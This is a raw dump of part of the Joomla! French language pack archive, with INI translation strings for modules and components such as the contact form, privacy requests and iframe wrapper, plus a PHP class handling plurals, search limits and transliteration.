MOD_LANGUAGES_FIELD_DROPDOWN_IMAGE_DESC="Ajoute les drapeaux à la liste déroulante."
MOD_LANGUAGES_FIELD_DROPDOWN_IMAGE_LABEL="Drapeaux dans la liste déroulante"
MOD_LANGUAGES_FIELD_FOOTER_DESC="Vous pouvez spécifier un texte en utilisant du code HTML à afficher au-dessous du sélecteur de langue."
MOD_LANGUAGES_FIELD_FOOTER_LABEL="Texte après"
MOD_LANGUAGES_FIELD_FULL_NAME_DESC="Si activé, les noms natifs complets des langues seront affichés. Sinon, les abréviations en capitales du paramètre sef des langues de contenu seront utilisées. Exemple: EN pour English, FR pour Français."
MOD_LANGUAGES_FIELD_FULL_NAME_LABEL="Noms complets des langues"
MOD_LANGUAGES_FIELD_HEADER_DESC="Vous pouvez spécifier un texte en utilisant du code HTML à afficher au-dessus du sélecteur de langue."
MOD_LANGUAGES_FIELD_HEADER_LABEL="Texte avant"
MOD_LANGUAGES_FIELD_INLINE_DESC="Activer/Désactiver l'affichage horizontal du contenu de ce module."
MOD_LANGUAGES_FIELD_INLINE_LABEL="Affichage horizontal"
MOD_LANGUAGES_FIELD_LINEHEIGHT_DESC="Si oui, diminuera l'interlignage lors de l'utilisation des drapeaux."
MOD_LANGUAGES_FIELD_LINEHEIGHT_LABEL="Interlignage"
MOD_LANGUAGES_FIELD_MODULE_LAYOUT_DESC="Utiliser la mise en page propre aux fichiers du module ou la remplacer par celle générée par les fichiers du template. La sélection 'Défaut' affiche les drapeaux des langues disponibles."
MOD_LANGUAGES_FIELD_USEIMAGE_DESC="Activer l'affichage d'images illustrant les drapeaux des différentes langues disponibles. Sinon seront utilisés les noms natifs des langues de contenu."
MOD_LANGUAGES_FIELD_USEIMAGE_LABEL="Images des drapeaux"
MOD_LANGUAGES_OPTION_DEFAULT_LANGUAGE="Défaut"
MOD_LANGUAGES_SPACERDROP_LABEL="<u>Si 'Utiliser liste déroulante' est activé, <br />les options d'affichage ci-dessous seront ignorées</u>"
MOD_LANGUAGES_SPACERNAME_LABEL="<u>Si 'Images des drapeaux' est activé, <br />les options d'affichage ci-dessous seront ignorées</u>"
MOD_LANGUAGES_SPACER_USENAME_LABEL="<u>Comme 'Utiliser liste déroulante' et 'Drapeaux dans la liste déroulante' ne sont pas activés,<br /> le module affichera les noms de langues.</u>"
MOD_LANGUAGES_XML_DESCRIPTION="Le module 'mod_language' permet de choisir une langue (telles que définies dans Le Gestionnaire de langues, onglet 'Contenu') pour n'afficher que les contenus qui lui sont attribués.<br />Lorsque le plug-in 'Filtre de langue' est activé, que l'utilisateur change de langue et que l'élément n'a pas d'association, l'utilisateur est redirigé sur la page d'accueil définie pour la langue sélectionnée.<br />Si le paramètre d'association est activé dans le plug-in 'Filtre de langue' et que l'élément affiché est associé, l'utilisateur sera redirigé vers l'élément associé pour la langue choisie.<br /> Si le plug-in n'est pas activé, les résultats seront imprévisibles.<br /><br /><strong>Procédure :</strong><br />1. Ouvrez le Gestionnaire de langue, onglet 'Contenu', assurez-vous que les langues désirées soient publiées et que leurs tags de langue, préfixes d'image et codes de langue soient corrects.<br />2. Créez pour chaque langue de contenu un menu spécifique.<br />3. Créez dans chacun de ces menus un lien de menu auquel est assigné la langue désirée, affichant un contenu auquel la même langue sera assignée. Définissez ce lien de menu comme page d'accueil par défaut.<br />4. Créez tous les articles et modules souhaités en leur assignant la langue désirée.<br /> 5. Quand des liens de menu sont associés, assurez-vous que le module est affiché sur les pages concernées.<br />6. L'ordre d'affichage des drapeaux ou les noms de langue dans le module sont définis par l'ordre défini dans le 'Gestionnaire de langues', onglet 'Contenu'.<br /> 6. N'oubliez pas de publier ce module et d'activer le 'Filtre de langue' !"
PK!���fr-FR/fr-FR.mod_footer.sys.ininu&1i�; @date        2015-10-22
; @author      Joomla! Project
; @copyright   (C) 2005 - 2020 Open Source Matters. All rights reserved.
; @copyright   (C) 2005 - 2020 Joomla.fr [Traduction]
; @license     GNU General Public License version 2 or later; see LICENSE.txt
; @note        Complete
; @note        Client Site
; @note        All ini files need to be saved as UTF-8


MOD_FOOTER="Copyright de Joomla!"
MOD_FOOTER_XML_DESCRIPTION="Le module 'mod_footer' affiche les infos du copyright de Joomla!"
MOD_FOOTER_LAYOUT_DEFAULT="Défaut"

PK!��<��
�
fr-FR/fr-FR.com_contact.ininu&1i�; @date        2015-01-30
; @author      Joomla! Project
; @copyright   (C) 2005 - 2020 Open Source Matters. All rights reserved.
; @copyright   (C) 2005 - 2020 Joomla.fr [Traduction]
; @license     GNU General Public License version 2 or later; see LICENSE.txt
; @note        Complete
; @note        Client Site
; @note        All ini files need to be saved as UTF-8


COM_CONTACT_ADDRESS="Adresse"
COM_CONTACT_ARTICLES_HEADING="Articles du Contact"
COM_CONTACT_CAPTCHA_LABEL="Captcha"
COM_CONTACT_CAPTCHA_DESC="Merci de compléter le contrôle de sécurité."
COM_CONTACT_CAT_NUM="Nombre de Contacts :"
COM_CONTACT_CONTACT_DEFAULT_LABEL="Envoyer un e-mail"
COM_CONTACT_CONTACT_EMAIL_A_COPY_DESC="Envoie une copie du message à l'adresse que vous avez fournie."
COM_CONTACT_CONTACT_EMAIL_A_COPY_LABEL="Envoyer une copie à votre adresse"
COM_CONTACT_CONTACT_EMAIL_NAME_DESC="Votre nom"
COM_CONTACT_CONTACT_EMAIL_NAME_LABEL="Nom"
COM_CONTACT_CONTACT_ENTER_MESSAGE_DESC="Saisir ici votre message."
COM_CONTACT_CONTACT_ENTER_MESSAGE_LABEL="Message"
COM_CONTACT_CONTACT_ENTER_VALID_EMAIL="Veuillez saisir une adresse e-mail valide."
COM_CONTACT_CONTACT_REQUIRED="<strong class=\"red\">*</strong> Champ requis"
COM_CONTACT_CONTENT_TYPE_CONTACT="Contact"
COM_CONTACT_CONTENT_TYPE_CATEGORY="Catégorie de contact"
COM_CONTACT_FILTER_LABEL="Champ de filtre"
COM_CONTACT_FILTER_SEARCH_DESC="Filtre de recherche dans les fiches de contact."
COM_CONTACT_CONTACT_MESSAGE_SUBJECT_DESC="Saisir ici le sujet de votre message."
COM_CONTACT_CONTACT_MESSAGE_SUBJECT_LABEL="Sujet"
COM_CONTACT_CONTACT_SEND="Envoyer"
COM_CONTACT_COPYSUBJECT_OF="Copie de : %s"
COM_CONTACT_COPYTEXT_OF="Ceci est une copie du message que vous avez envoyé à %s via %s"
COM_CONTACT_COUNT="Nombre de contacts :"
COM_CONTACT_COUNTRY="Pays"
COM_CONTACT_DEFAULT_PAGE_TITLE="Contacts"
COM_CONTACT_DETAILS="Contact"
COM_CONTACT_DOWNLOAD_INFORMATION_AS="Télécharger les informations :"
COM_CONTACT_EMAIL_BANNEDTEXT="Le %s de votre e-mail contient du texte interdit."
COM_CONTACT_EMAIL_DESC="Adresse e-mail du contact"
COM_CONTACT_EMAIL_FORM="Formulaire de Contact"
COM_CONTACT_EMAIL_LABEL="E-mail"
COM_CONTACT_EMAIL_THANKS="Merci pour votre message."
COM_CONTACT_ENQUIRY_TEXT="Ceci est un message expédié via %s par :"
COM_CONTACT_ERROR_CONTACT_NOT_FOUND="Contact introuvable"
COM_CONTACT_FAX="Fax"
COM_CONTACT_FAX_NUMBER="Fax : %s"
COM_CONTACT_FORM_LABEL="Envoyer un e-mail. Tous les champs marqués d'un astérisque * sont obligatoires."
COM_CONTACT_FORM_NC="Assurez-vous d'avoir rempli correctement le formulaire."
COM_CONTACT_IMAGE_DETAILS="Image de contact"
COM_CONTACT_LINKS="Liens"
COM_CONTACT_MAILENQUIRY="%s demande de renseignements"
COM_CONTACT_MOBILE="Mobile"
COM_CONTACT_MOBILE_NUMBER="Mobile : %s"
COM_CONTACT_NO_CONTACTS="Il n'y a aucun Contact à afficher"
COM_CONTACT_NOT_MORE_THAN_ONE_EMAIL_ADDRESS="Vous ne pouvez saisir qu'une seule adresse e-mail."
COM_CONTACT_NUM_ITEMS="Nombre de contacts :"
COM_CONTACT_OPTIONAL="(facultatif)"
COM_CONTACT_OTHER_INFORMATION="Informations diverses"
COM_CONTACT_POSITION="Fonction"
COM_CONTACT_PROFILE="Profil"
COM_CONTACT_PROFILE_HEADING="Profil du Contact"
COM_CONTACT_SELECT_CONTACT="Sélectionnez un contact :"
COM_CONTACT_SESSION_INVALID="Cookie de session invalide. Vérifier que le navigateur accepte les cookies."
COM_CONTACT_STATE="État"
COM_CONTACT_SUBURB="Ville"
COM_CONTACT_TELEPHONE="Téléphone"
COM_CONTACT_TELEPHONE_NUMBER="Téléphone : %s"
COM_CONTACT_USER_FIELDS="Champs"
COM_CONTACT_VCARD="vCard"
PK!'%���!fr-FR/fr-FR.mod_syndicate.sys.ininu&1i�; @date        2015-10-22
; @author      Joomla! Project
; @copyright   (C) 2005 - 2020 Open Source Matters. All rights reserved.
; @copyright   (C) 2005 - 2020 Joomla.fr [Traduction]
; @license     GNU General Public License version 2 or later; see LICENSE.txt
; @note        Complete
; @note        Client Site
; @note        All ini files need to be saved as UTF-8


MOD_SYNDICATE="Lien de flux RSS ou ATOM"
MOD_SYNDICATE_XML_DESCRIPTION="Le module 'mod_syndicate' affiche un lien de flux RSS ou ATOM pour permettre d'afficher le contenu de la page où il se situe sur un autre site ou dans des lecteurs de fils d'actualités."
MOD_SYNDICATE_LAYOUT_DEFAULT="Défaut"

PK!�����
�
fr-FR/fr-FR.localise.phpnu&1i�<?php
/**
 * @package    Joomla.Language
 *
 * @copyright  Copyright (C) 2005 - 2017 Open Source Matters, Inc. All rights reserved.
 * @license    GNU General Public License version 2 or later; see LICENSE.txt
 */

defined('_JEXEC') or die;

/**
 * fr-FR localise class
 *
 * @package             Joomla.Language
 * @since               1.6
 */
abstract class Fr_FRLocalise
	{
		/**
		 * Returns the potential suffixes for a specific number of items
		 *
		 * @param 	int $count  The number of items.
		 * @return 	array  An array of potential suffixes.
		 * @since 	1.6
		 */
		public static function getPluralSuffixes($count)
		{
			if ($count == 0)
			{
				$return = array('0');
			}
			elseif($count == 1)
			{
				$return = array('1');
			}
			else
			{
				$return = array('MORE');
			}

			return $return;
		}
		/**
		 * Returns the ignored search words
		 *
		 * @return 	array  An array of ignored search words.
		 * @since 	1.6
		 */
		public static function getIgnoredSearchWords()
		{
			$search_ignore = array();
			$search_ignore[] = "et";
			$search_ignore[] = "si";
			$search_ignore[] = "ou";
			return $search_ignore;
		}
		/**
		 * Returns the lower length limit of search words
		 *
		 * @return	integer  The lower length limit of search words.
		 * @since	1.6
		 */
		public static function getLowerLimitSearchWord()
		{
			return 3;
		}
		/**
		 * Returns the upper length limit of search words
		 *
		 * @return	integer  The upper length limit of search words.
		 * @since	1.6
		 */
		public static function getUpperLimitSearchWord()
		{
			return 20;
		}
		/**
		 * Returns the number of chars to display when searching
		 *
		 * @return      integer  The number of chars to display when searching.
		 * @since      1.6
		 */
		public static function getSearchDisplayedCharactersNumber()
		{
			return 200;
		}

		/**
		 * This method processes a string and replaces all accented UTF-8 characters by unaccented
		 * ASCII-7 "equivalents"
		 *
		 * @param	string	$string	The string to transliterate
		 * @return	string	The transliteration of the string
		 * @since	1.6
		 */
		public static function transliterate($string)
		{
		$str = \Joomla\String\StringHelper::strtolower($string);
		// Specific language transliteration.
		// This one is for latin 1, latin supplement , extended A, Cyrillic, Greek

		$glyph_array = array(
		'a'		=>	'a,à,á,â,ã,ä,å,ā,ă,ą,ḁ,α,ά',
		'ae'	=>	'æ',
		'b'		=>	'β,б',
		'c'		=>	'c,ç,ć,ĉ,ċ,č,ћ,ц',
		'ch'	=>	'ч',
		'd'		=>	'ď,đ,Ð,д,ђ,δ,ð',
		'dz'	=>	'џ',
		'e'		=>	'e,è,é,ê,ë,ē,ĕ,ė,ę,ě,э,ε,έ',
		'f'		=>	'ƒ,ф',
		'g'		=>	'ğ,ĝ,ğ,ġ,ģ,г,γ',
		'h'		=>	'ĥ,ħ,Ħ,х',
		'i'		=>	'i,ì,í,î,ï,ı,ĩ,ī,ĭ,į,и,й,ъ,ы,ь,η,ή',
		'ij'	=>	'ij',
		'j'		=>	'ĵ,j',
		'ja'	=>	'я',
		'ju'	=>	'яю',
		'k'		=>	'ķ,ĸ,κ',
		'l'		=>	'ĺ,ļ,ľ,ŀ,ł,л,λ',
		'lj'	=>	'љ',
		'm'		=>	'μ,м',
		'n'		=>	'ñ,ņ,ň,ʼn,ŋ,н,ν',
		'nj'	=>	'њ',
		'o'		=>	'ò,ó,ô,õ,ø,ō,ŏ,ő,ο,ό,ω,ώ',
		'oe'	=>	'œ,ö',
		'p'		=>	'п,π',
		'ph'	=>	'φ',
		'ps'	=>	'ψ',
		'r'		=>	'ŕ,ŗ,ř,р,ρ,σ,ς',
		's'		=>	'ş,ś,ŝ,ş,š,с',
		'ss'	=>	'ß,ſ',
		'sh'	=>	'ш',
		'shch'	=>	'щ',
		't'		=>	'ţ,ť,ŧ,τ,т',
		'th'	=>	'θ',
		'u'		=>	'u,ù,ú,û,ü,ũ,ū,ŭ,ů,ű,ų,у',
		'v'		=>	'в',
		'w'		=>	'ŵ',
		'x'		=>	'χ,ξ',
		'y'		=>	'ý,þ,ÿ,ŷ',
		'z'		=>	'ź,ż,ž,з,ж,ζ'
		);

		foreach($glyph_array as $letter => $glyphs)
		{
			$glyphs = explode(',', $glyphs);
			$str = str_replace($glyphs, $letter, $str);
		}

		return $str;
		}
}
PK!`#l��fr-FR/fr-FR.com_privacy.ininu&1i�; @date        2018-08-27
; @author      Joomla! Project
; @copyright   (C) 2005 - 2020 Open Source Matters. All rights reserved.
; @copyright   (C) 2005 - 2020 Joomla.fr [Traduction]
; @license     GNU General Public License version 2 or later; see LICENSE.txt
; @note        Complete
; @note        Client Site
; @note        All ini files need to be saved as UTF-8


COM_PRIVACY="Confidentialité"
COM_PRIVACY_ADMIN_NOTIFICATION_USER_CONFIRMED_REQUEST_MESSAGE="L'utilisateur %1$s a confirmé sa demande d'informations."
COM_PRIVACY_ADMIN_NOTIFICATION_USER_CONFIRMED_REQUEST_SUBJECT="Demande d'informations confirmée par l'utilisateur"
COM_PRIVACY_ADMIN_NOTIFICATION_USER_CREATED_REQUEST_MESSAGE="Une nouvelle demande d'informations a été soumise par %1$s."
COM_PRIVACY_ADMIN_NOTIFICATION_USER_CREATED_REQUEST_SUBJECT="Demande d'information soumise"
COM_PRIVACY_CONFIRM_REMIND_SUCCEEDED="Votre consentement à la politique de confidentialité de ce site Web a été prolongé."
COM_PRIVACY_CONFIRM_REQUEST_FIELDSET_LABEL="Un courrier électronique a été envoyé à votre adresse mail. Le courrier électronique a un identifiant de sécurité, merci de confirmer de nouveau votre adresse mail et collez l'identifiant de sécurité dans le champ ci-dessous pour prouver que vous êtes le propriétaire des informations demandées."
COM_PRIVACY_CONFIRM_REQUEST_SUCCEEDED="Votre demande d'informations a été confirmée. Nous traiterons votre demande dès que possible et l'exportation sera envoyée à votre adresse e-mail."
COM_PRIVACY_CREATE_REQUEST_SUCCEEDED="Votre demande d'informations a été créée. Avant qu'elle soit traitée, vous devez vérifier cette demande. Un courrier électronique a été envoyé à votre adresse avec des instructions supplémentaires pour compléter cette vérification."
; You can use the following merge codes for all COM_PRIVACY_EMAIL strings:
; [SITENAME]  Site name, as set in Global Configuration.
; [URL]       URL of the site's frontend page.
; [TOKENURL]  URL of the confirm page with the token prefilled.
; [FORMURL]   URL of the confirm page where the user can paste their token.
; [TOKEN]     The confirmation token.
; \n          Newline character. Use it to start a new line in the email.
COM_PRIVACY_EMAIL_REQUEST_BODY_EXPORT_REQUEST="Quelqu'un a créé une demande pour exporter toutes les informations personnelles liées à cette adresse e-mail sur [URL]. Par mesure de sécurité, vous devez confirmer qu'il s'agit d'une demande valide d'obtention de vos informations personnelles sur ce site Web.n\n\S'il s'agit d'une erreur, ignorer le mail et cela n'aura aucune conséquence.\n\nPour confirmer cette demande, vous pouvez effectuer l'une des tâches suivantes:\n\n1. Visiter l'URL suivante : [TOKENURL]\n\n2. Copier votre identifiant de sécurité ci-dessous, visiter l'URL référencée et coller cet identifiant dans le formulaire.\nURL: [FORMURL]\nIdentifiant de sécurité : [TOKEN]\n\nVeuillez noter que cet identifiant n'est valide que pendant 24 heures à compter de la date d'envoi de cet e-mail."
COM_PRIVACY_EMAIL_REQUEST_BODY_REMOVE_REQUEST="Quelqu'un a créé une demande pour supprimer toutes les informations personnelles liées à cette adresse e-mail sur [URL]. Par mesure de sécurité, vous devez confirmer qu'il s'agit d'une demande valide d'obtention de vos informations personnelles sur ce site Web.n\n\S'il s'agit d'une erreur, ignorer le mail et cela n'aura aucune conséquence.\n\nPour confirmer cette demande, vous pouvez effectuer l'une des tâches suivantes:\n\n1. Visiter l'URL suivante : [TOKENURL]\n\n2. Copier votre identifiant de sécurité ci-dessous, visiter l'URL référencée et coller cet identifiant dans le formulaire.\nURL: [FORMURL]\nIdentifiant de sécurité : [TOKEN]\n\nVeuillez noter que cet identifiant n'est valide que pendant 24 heures à compter de la date d'envoi de cet e-mail."
COM_PRIVACY_EMAIL_REQUEST_SUBJECT_EXPORT_REQUEST="Demande d'informations créée sur [SITENAME]"
COM_PRIVACY_EMAIL_REQUEST_SUBJECT_REMOVE_REQUEST="Demande de suppression d'informations sur [SITENAME]"
COM_PRIVACY_ERROR_CANNOT_CREATE_REQUEST_WHEN_SENDMAIL_DISABLED="Une demande d'informations ne peut être créée lorsque le support par courrier électronique est désactivé."
COM_PRIVACY_ERROR_CHECKING_FOR_EXISTING_REQUESTS="Il y a eu une erreur de vérification pour les demandes d'informations existantes, veuillez essayer de soumettre à nouveau cette demande."
COM_PRIVACY_ERROR_CONFIRM_TOKEN_EXPIRED="L'identification de sécurité de votre demande d'informations a expiré. Vous devrez soumettre une nouvelle demande."
COM_PRIVACY_ERROR_CONFIRMING_REMIND_FAILED="Aucun rappel d'expiration n'a été trouvé."
COM_PRIVACY_ERROR_CONFIRMING_REQUEST="Erreur lors de la confirmation de la demande d'informations."
COM_PRIVACY_ERROR_CONFIRMING_REQUEST_FAILED="Votre confirmation de demande d'informations a échoué. %s"
COM_PRIVACY_ERROR_CREATING_REQUEST="Erreur lors de la création de la demande d'informations."
COM_PRIVACY_ERROR_CREATING_REQUEST_FAILED="Votre demande d'informations n'a pu être créée. %s"
COM_PRIVACY_ERROR_NO_PENDING_REMIND="Aucun rappel d'expiration n'a encore été envoyé."
COM_PRIVACY_ERROR_NO_PENDING_REQUESTS="Il n'y a pas de demande d'informations nécessitant une confirmation pour cette adresse e-mail."
COM_PRIVACY_ERROR_NO_REMIND_REQUESTS="Veuillez vérifier à nouveau l'identifiant de sécurité."
COM_PRIVACY_ERROR_PENDING_REQUEST_OPEN="Il existe déjà une demande active d'informations pour cette adresse e-mail et ce type de demande. Veuillez contacter le propriétaire du site pour obtenir des mises à jour sur cette demande."
COM_PRIVACY_ERROR_REMIND_REQUEST="Une erreur s'est produite lors du traitement de votre demande."
COM_PRIVACY_ERROR_UNKNOWN_REQUEST_TYPE="Type inconnu de demande d'informations."
COM_PRIVACY_FIELD_CONFIRM_CONFIRM_TOKEN_DESC="Entrez l'identifiant de sécurité de confirmation que vous avez reçu par e-mail."
COM_PRIVACY_FIELD_CONFIRM_CONFIRM_TOKEN_LABEL="Identifiant de sécurité de confirmation"
COM_PRIVACY_FIELD_CONFIRM_EMAIL_DESC="Saisir votre adresse e-mail."
COM_PRIVACY_FIELD_REMIND_CONFIRM_TOKEN_DESC="Entrez l'identifiant de sécurité de confirmation que vous avez reçu par e-mail."
COM_PRIVACY_FIELD_REMIND_CONFIRM_TOKEN_LABEL="Identifiant de sécurité de confirmation"
COM_PRIVACY_FIELD_REQUEST_TYPE_DESC="Le type de demande d'informations."
COM_PRIVACY_FIELD_REQUEST_TYPE_LABEL="Type de demande"
COM_PRIVACY_FIELD_STATUS_DESC="Le statut de la demande d'informations."
COM_PRIVACY_REMIND_REQUEST_FIELDSET_LABEL="Renouveler le consentement à la politique de confidentialité"
COM_PRIVACY_REQUEST_TYPE_EXPORT="Exporter"
COM_PRIVACY_REQUEST_TYPE_REMOVE="Supprimer"
COM_PRIVACY_VIEW_CONFIRM_PAGE_TITLE="Confirmer la demande d'informations"
COM_PRIVACY_VIEW_REQUEST_PAGE_TITLE="Soumettre une demande d'informations"
COM_PRIVACY_WARNING_CANNOT_CREATE_REQUEST_WHEN_SENDMAIL_DISABLED="Nous sommes désolés, vous ne pouvez pas soumettre de demande d’informations pour le moment."
PK!�D�,77$fr-FR/fr-FR.mod_random_image.sys.ininu&1i�; @date        2015-10-22
; @author      Joomla! Project
; @copyright   (C) 2005 - 2020 Open Source Matters. All rights reserved.
; @copyright   (C) 2005 - 2020 Joomla.fr [Traduction]
; @license     GNU General Public License version 2 or later; see LICENSE.txt
; @note        Complete
; @note        Client Site
; @note        All ini files need to be saved as UTF-8


MOD_RANDOM_IMAGE="Image aléatoire"
MOD_RANDOM_IMAGE_XML_DESCRIPTION="Le module 'mod_random_image' affiche une image aléatoire d'un dossier spécifié."
MOD_RANDOM_IMAGE_LAYOUT_DEFAULT="Défaut"

PK!}G��fr-FR/fr-FR.mod_wrapper.ininu&1i�; @date        2015-10-22
; @author      Joomla! Project
; @copyright   (C) 2005 - 2020 Open Source Matters. All rights reserved.
; @copyright   (C) 2005 - 2020 Joomla.fr [Traduction]
; @license     GNU General Public License version 2 or later; see LICENSE.txt
; @note        Complete
; @note        Client Site
; @note        All ini files need to be saved as UTF-8


MOD_WRAPPER="Fenêtre intégrée"
MOD_WRAPPER_FIELD_ADD_DESC="Activer/Désactiver l'ajout automatique de la valeur http:// en début d'URL si http:// ou https:// n'est pas précisé."
MOD_WRAPPER_FIELD_ADD_LABEL="Ajout automatique"
MOD_WRAPPER_FIELD_AUTOHEIGHT_DESC="Activer/Désactiver l'ajustement automatique de la hauteur de l'iframe selon son contenu. Cette fonction n'est active que pour les pages de votre site."
MOD_WRAPPER_FIELD_AUTOHEIGHT_LABEL="Hauteur automatique"
MOD_WRAPPER_FIELD_FRAME_DESC="Afficher la bordure entourant l'iframe"
MOD_WRAPPER_FIELD_FRAME_LABEL="Bordure"
MOD_WRAPPER_FIELD_HEIGHT_DESC="Spécifiez la hauteur de la fenêtre iframe en valeur absolue (pixels) ou en valeur relative (%)."
MOD_WRAPPER_FIELD_HEIGHT_LABEL="Hauteur"
MOD_WRAPPER_FIELD_SCROLL_DESC="Afficher/Masquer les barres de défilement horizontale et verticale dans les iframes. La valeur 'Automatique' ajoutera les ascenseurs uniquement si nécessaire."
MOD_WRAPPER_FIELD_SCROLL_LABEL="Barre de défilement"
MOD_WRAPPER_FIELD_TARGET_DESC="Nom de l'iframe lorsqu'elle est utilisée comme cible"
MOD_WRAPPER_FIELD_TARGET_LABEL="Nom de la cible"
MOD_WRAPPER_FIELD_URL_DESC="Spécifiez l'adresse URL du contenu (site/fichier) à afficher au sein de l'Iframe."
MOD_WRAPPER_FIELD_URL_LABEL="URL du contenu"
MOD_WRAPPER_FIELD_VALUE_AUTO="Automatique"
MOD_WRAPPER_FIELD_WIDTH_DESC="Spécifiez la largeur de la fenêtre iframe en valeur absolue (pixels) ou en valeur relative (%)."
MOD_WRAPPER_FIELD_WIDTH_LABEL="Largeur"
MOD_WRAPPER_NO_IFRAMES="Pas d'Iframe"
MOD_WRAPPER_XML_DESCRIPTION="Le module 'mod_wrapper' affiche une fenêtre intégrée (iframe) contenant la page d'une URL spécifiée."
PK!9�_���!fr-FR/fr-FR.lib_simplepie.sys.ininu&1i�; @date        2015-10-22
; @author      Joomla! Project
; @copyright   (C) 2005 - 2020 Open Source Matters. All rights reserved.
; @copyright   (C) 2005 - 2020 Joomla.fr [Traduction]
; @license     GNU General Public License version 2 or later; see LICENSE.txt
; @note        Complete
; @note        Client Site
; @note        All ini files need to be saved as UTF-8


LIB_SIMPLEPIE_XML_DESCRIPTION="'Framework' en PHP pour les fils d'actualité RSS et Atom."

PK!9#i++fr-FR/fr-FR.mod_feed.sys.ininu&1i�; @date        2015-10-22
; @author      Joomla! Project
; @copyright   (C) 2005 - 2020 Open Source Matters. All rights reserved.
; @copyright   (C) 2005 - 2020 Joomla.fr [Traduction]
; @license     GNU General Public License version 2 or later; see LICENSE.txt
; @note        Complete
; @note        Client Site
; @note        All ini files need to be saved as UTF-8


MOD_FEED="Fil d'actualité RSS/RDF/ATOM"
MOD_FEED_XML_DESCRIPTION="Le module 'mod_feed' affiche les articles d'un fil d'actualité RSS, RDF ou ATOM."
MOD_FEED_LAYOUT_DEFAULT="Défaut"

PK!����fr-FR/fr-FR.com_mailto.ininu&1i�; @date        2015-10-22
; @author      Joomla! Project
; @copyright   (C) 2005 - 2020 Open Source Matters. All rights reserved.
; @copyright   (C) 2005 - 2020 Joomla.fr [Traduction]
; @license     GNU General Public License version 2 or later; see LICENSE.txt
; @note        Complete
; @note        Client Site
; @note        All ini files need to be saved as UTF-8


COM_MAILTO="Envoi de mail"
COM_MAILTO_CANCEL="Annuler"
COM_MAILTO_CAPTCHA="Captcha"
COM_MAILTO_CLOSE_WINDOW="Fermer la fenêtre"
COM_MAILTO_EMAIL_ERR_NOINFO="Veuillez saisir une adresse e-mail valide."
COM_MAILTO_EMAIL_INVALID="L'adresse '%s' n'apparaît pas comme une adresse e-mail valide."
COM_MAILTO_EMAIL_MSG="Ceci est un e-mail de (%s) expédié par %s (%s). Vous devriez être intéressé par le lien suivant : %s"
COM_MAILTO_EMAIL_NOT_SENT="L'e-mail ne peut pas être envoyé."
COM_MAILTO_EMAIL_SENT="L'e-mail a été expédié."
COM_MAILTO_EMAIL_TO="Destinataire"
COM_MAILTO_EMAIL_TO_A_FRIEND="Envoyer ce lien par e-mail à un ami."
COM_MAILTO_LINK_IS_MISSING="Le lien est manquant"
COM_MAILTO_SEND="Expédier"
COM_MAILTO_SENDER="Expéditeur"
COM_MAILTO_SENT_BY="Message envoyé par %s"
COM_MAILTO_SUBJECT="Sujet"
COM_MAILTO_YOUR_EMAIL="Votre adresse e-mail"
PK!�c��II$fr-FR/fr-FR.mod_articles_archive.ininu&1i�; @date        2015-01-30
; @author      Joomla! Project
; @copyright   (C) 2005 - 2020 Open Source Matters. All rights reserved.
; @copyright   (C) 2005 - 2020 Joomla.fr [Traduction]
; @license     GNU General Public License version 2 or later; see LICENSE.txt
; @note        Complete
; @note        Client Site
; @note        All ini files need to be saved as UTF-8


MOD_ARTICLES_ARCHIVE="Articles - Archivés"
MOD_ARTICLES_ARCHIVE_FIELD_COUNT_LABEL="Nombre par mois"
MOD_ARTICLES_ARCHIVE_FIELD_COUNT_DESC="Spécifiez le nombre d'articles par mois à afficher sur une page (10 par défaut)."
MOD_ARTICLES_ARCHIVE_XML_DESCRIPTION="Le module 'mod_articles_archive' affiche un calendrier mensuel des articles archivés. Lorsque vous archivez un article, cette liste est automatiquement mise à jour."
MOD_ARTICLES_ARCHIVE_DATE="%1$s, %2$s"

PK!sg����fr-FR/fr-FR.mod_footer.ininu&1i�; @date        2015-09-21
; @author      Joomla! Project
; @copyright   (C) 2005 - 2020 Open Source Matters. All rights reserved.
; @copyright   (C) 2005 - 2020 Joomla.fr [Traduction]
; @license     GNU General Public License version 2 or later; see LICENSE.txt
; @note        Complete
; @note        Client Site
; @note        All ini files need to be saved as UTF-8


MOD_FOOTER="Copyright de Joomla!"
MOD_FOOTER_LINE1="Copyright &#169; %date% %sitename% - Tous droits réservés"
MOD_FOOTER_LINE2="<a href='https://www.joomla.org'>Joomla!</a> est un Logiciel Libre diffusé sous licence <a href='https://www.gnu.org/licenses/gpl-2.0.html'>GNU General Public</a>"
MOD_FOOTER_XML_DESCRIPTION="Le module 'mod_footer' affiche les infos du copyright de Joomla!"
PK!$��%%%fr-FR/fr-FR.mod_articles_category.ininu&1i�; @date        2015-01-30
; @author      Joomla! Project
; @copyright   (C) 2005 - 2020 Open Source Matters. All rights reserved.
; @copyright   (C) 2005 - 2020 Joomla.fr [Traduction]
; @license     GNU General Public License version 2 or later; see LICENSE.txt
; @note        Complete
; @note        Client Site
; @note        All ini files need to be saved as UTF-8


MOD_ARTICLES_CATEGORY="Articles - Catégorie"
MOD_ARTICLES_CATEGORY_FIELD_ARTICLEGROUPING_DESC="Sélectionnez le type de regroupement des articles."
MOD_ARTICLES_CATEGORY_FIELD_ARTICLEGROUPING_LABEL="Regroupement"
MOD_ARTICLES_CATEGORY_FIELD_ARTICLEGROUPINGDIR_DESC="Sélectionnez le sens de tri du regroupement des articles."
MOD_ARTICLES_CATEGORY_FIELD_ARTICLEGROUPINGDIR_LABEL="Sens de regroupement"
MOD_ARTICLES_CATEGORY_FIELD_ARTICLEORDERING_DESC="Sélectionnez le champ par lequel les articles sont triés."
MOD_ARTICLES_CATEGORY_FIELD_ARTICLEORDERING_LABEL="Champ de tri"
MOD_ARTICLES_CATEGORY_FIELD_ARTICLEORDERINGDIR_DESC="Sélectionnez le sens de tri des articles. Tri par Articles en vedette ne doit être utilisé que lorsque l'option de tri pour les Articles en vedette est paramètré sur 'Uniquement'."
MOD_ARTICLES_CATEGORY_FIELD_ARTICLEORDERINGDIR_LABEL="Sens du tri"
MOD_ARTICLES_CATEGORY_FIELD_AUTHOR_DESC="Si vous le souhaitez, sélectionnez un ou plusieurs auteurs."
MOD_ARTICLES_CATEGORY_FIELD_AUTHOR_LABEL="Auteurs"
MOD_ARTICLES_CATEGORY_FIELD_AUTHORALIAS_DESC="Si vous le souhaitez, sélectionnez un ou plusieurs alias d'auteurs."
MOD_ARTICLES_CATEGORY_FIELD_AUTHORALIAS_LABEL="Alias d'auteurs "
MOD_ARTICLES_CATEGORY_FIELD_AUTHORALIASFILTERING_DESC="Le mode 'Inclure' inclut uniquement les alias d'auteur sélectionnés<br />Le mode 'Exclure' exclut toutes les alias d'auteur sélectionnés."
